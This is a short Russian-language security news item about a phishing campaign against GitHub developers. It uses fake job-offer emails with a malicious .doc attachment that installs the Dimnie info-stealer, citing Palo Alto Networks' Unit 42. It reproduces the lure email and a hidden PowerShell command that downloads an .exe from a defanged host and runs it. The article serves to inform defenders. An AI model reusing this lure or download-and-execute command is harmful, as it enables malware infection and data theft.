В середине января группе исследователей стало известно о том, что некоторые разработчики получали письма с вредоносными вложениями. Владельцы аккаунтов GitHub получили письма с подобным содержанием:
1 2 3 4 5 6 7 8 9 10 | Привет! Меня зовут Адам Бахбиндер, я посмотрел твой репозиторий, и он впечатлил меня. В моей компании есть позиция, которая как раз тебе подходит. Пожалуйста, посмотри вложенные в письмо описания вакансии и компании. Свяжись со мной по email, указанному в документе. Всего хорошего, Адам |
Было получено много аналогичных вариантов сообщения, но все они содержали один и тот же вредоносный .doc-файл. В этом файле содержался код, который запускал PowerShell-скрипт. После этого происходила загрузка и запуск .exe-файла. Вот читаемая версия скрипта:
1 2 | cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/ margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'" |
В начале зловред казался стандартным, но в процессе изучения стало понятно, что вредоносный код, который вызывается в результате исполнения скрипта, достаточно известен в сфере кибербезопасности. Вирус, известный как Dimnie, внедряется в основные процессы операционной системы для кражи информации. Изначально данная технология была ориентирована на заражение российских пользователей, но за 3 года (впервые разновидность этого вируса была обнаружена в 2014 году) он «мутировал», став более скрытным и распространившись за пределы России.
Подробности о схеме работы Dimnie можно прочитать в отчёте команды Unit 42, обратившей внимание на эту волну фишинговых писем.
Источник: Palo Alto Networks